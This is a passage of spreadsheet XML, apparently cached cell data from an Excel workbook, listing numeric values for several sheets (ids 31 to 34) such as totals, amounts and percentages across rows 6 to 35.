        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>402</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>1000</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4318.19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268</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4543.99999999997</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>348</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>2036.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1871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3854.61</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>41.14</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>381.817</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>430</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>230.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3194.11</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>27594.33</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8027.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="31">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>5725</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>37665.8299999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>14.5</v>
          </cell>
          <cell r="M6">
            <v>460.58</v>
          </cell>
          <cell r="N6">
            <v>4654.5</v>
          </cell>
          <cell r="O6">
            <v>60.4166666666667</v>
          </cell>
          <cell r="P6">
            <v>63.9694444444444</v>
          </cell>
          <cell r="Q6">
            <v>53.279532967033</v>
          </cell>
          <cell r="R6">
            <v>89.7241379310345</v>
          </cell>
          <cell r="S6">
            <v>83.7465803986278</v>
          </cell>
          <cell r="T6">
            <v>85.9220109571383</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>24</v>
          </cell>
          <cell r="M7">
            <v>423.5</v>
          </cell>
          <cell r="N7">
            <v>4446.08</v>
          </cell>
          <cell r="O7">
            <v>100</v>
          </cell>
          <cell r="P7">
            <v>58.8194444444444</v>
          </cell>
          <cell r="Q7">
            <v>50.8937728937729</v>
          </cell>
          <cell r="R7">
            <v>184.333333333333</v>
          </cell>
          <cell r="S7">
            <v>188.583234946871</v>
          </cell>
          <cell r="T7">
            <v>187.667788253923</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>1301</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>335</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>90</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3227.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>1273</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>500</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>5091.19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3953</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>2613</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5883.99999999997</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>670</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>872</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1834.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>4424</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3680.99</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>124.4</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>97</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>409.217</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>236</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>203.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3241.49</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>28540.84</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9124.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="32">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3589</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>37613.1699999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>10.25</v>
          </cell>
          <cell r="M6">
            <v>470.83</v>
          </cell>
          <cell r="N6">
            <v>4664.75</v>
          </cell>
          <cell r="O6">
            <v>42.7083333333333</v>
          </cell>
          <cell r="P6">
            <v>63.2836021505376</v>
          </cell>
          <cell r="Q6">
            <v>53.2505707762557</v>
          </cell>
          <cell r="R6">
            <v>90.5365853658537</v>
          </cell>
          <cell r="S6">
            <v>83.8943992523841</v>
          </cell>
          <cell r="T6">
            <v>85.9321507047537</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>15.75</v>
          </cell>
          <cell r="M7">
            <v>439.25</v>
          </cell>
          <cell r="N7">
            <v>4461.83</v>
          </cell>
          <cell r="O7">
            <v>65.625</v>
          </cell>
          <cell r="P7">
            <v>59.0389784946236</v>
          </cell>
          <cell r="Q7">
            <v>50.9341324200913</v>
          </cell>
          <cell r="R7">
            <v>168.952380952381</v>
          </cell>
          <cell r="S7">
            <v>187.879339783722</v>
          </cell>
          <cell r="T7">
            <v>187.601723956314</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>154</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>774</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>670</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>354</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3543.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>124</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4967.19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-2.00088834390044e-11</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>2010</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1952</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5941.99999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>67</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>202</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1699.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2661</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3641.66</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>62</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>391.717</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>247.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>377.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3016.66</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>28091.68</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9521.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="33">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>0</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>37613.1699999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>0</v>
          </cell>
          <cell r="M6">
            <v>470.83</v>
          </cell>
          <cell r="N6">
            <v>4664.75</v>
          </cell>
          <cell r="O6">
            <v>0</v>
          </cell>
          <cell r="P6">
            <v>63.2836021505376</v>
          </cell>
          <cell r="Q6">
            <v>53.2505707762557</v>
          </cell>
          <cell r="R6">
            <v>0</v>
          </cell>
          <cell r="S6">
            <v>84.01</v>
          </cell>
          <cell r="T6">
            <v>86.25</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>0</v>
          </cell>
          <cell r="M7">
            <v>439.25</v>
          </cell>
          <cell r="N7">
            <v>4461.83</v>
          </cell>
          <cell r="O7">
            <v>0</v>
          </cell>
          <cell r="P7">
            <v>59.0389784946236</v>
          </cell>
          <cell r="Q7">
            <v>50.9341324200913</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
          <cell r="S7">
            <v>187.879339783722</v>
          </cell>
          <cell r="T7">
            <v>187.69</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>300</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>300</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>328.13</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3871.94</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>864.7</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>5831.89</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>350.398</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>350.397999999981</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>2000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>7941.99999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1699.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>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0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>-1.392</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>390.325</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>28091.68</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9521.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="34">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>0</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>37613.1699999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>0</v>
          </cell>
          <cell r="M6">
            <v>470.83</v>
          </cell>
          <cell r="N6">
            <v>4664.75</v>
          </cell>
          <cell r="O6">
            <v>0</v>
          </cell>
          <cell r="P6">
            <v>63.2836021505376</v>
          </cell>
          <cell r="Q6">
            <v>53.2505707762557</v>
          </cell>
          <cell r="R6">
            <v>0</v>
          </cell>
          <cell r="S6">
            <v>84.01</v>
          </cell>
          <cell r="T6">
            <v>86.25</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>0</v>
          </cell>
          <cell r="M7">
            <v>439.25</v>
          </cell>
          <cell r="N7">
            <v>4461.83</v>
          </cell>
          <cell r="O7">
            <v>0</v>
          </cell>
          <cell r="P7">
            <v>59.0389784946236</v>
          </cell>
          <cell r="Q7">
            <v>50.9341324200913</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
          <cell r="S7">
            <v>187.879339783722</v>
          </cell>
          <cell r="T7">
            <v>187.69</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>300</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3871.94</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>5831.89</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>350.397999999981</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>7941.99999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1699.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="M18">
            <v>0</v>
          </cell>
          <cell r="N18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="Q18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="T18">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>0</v>
          </cell>
          <cell r="E19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="M19">
            <v>-2.00373051484348e-12</v>
          </cell>
          <cell r="N19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="Q19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="T19">
            <v>-2.00373051484348e-12</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="M20">
            <v>0</v>
          </cell>
          <cell r="N20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="Q20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="T20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>390.325</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>28091.68</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
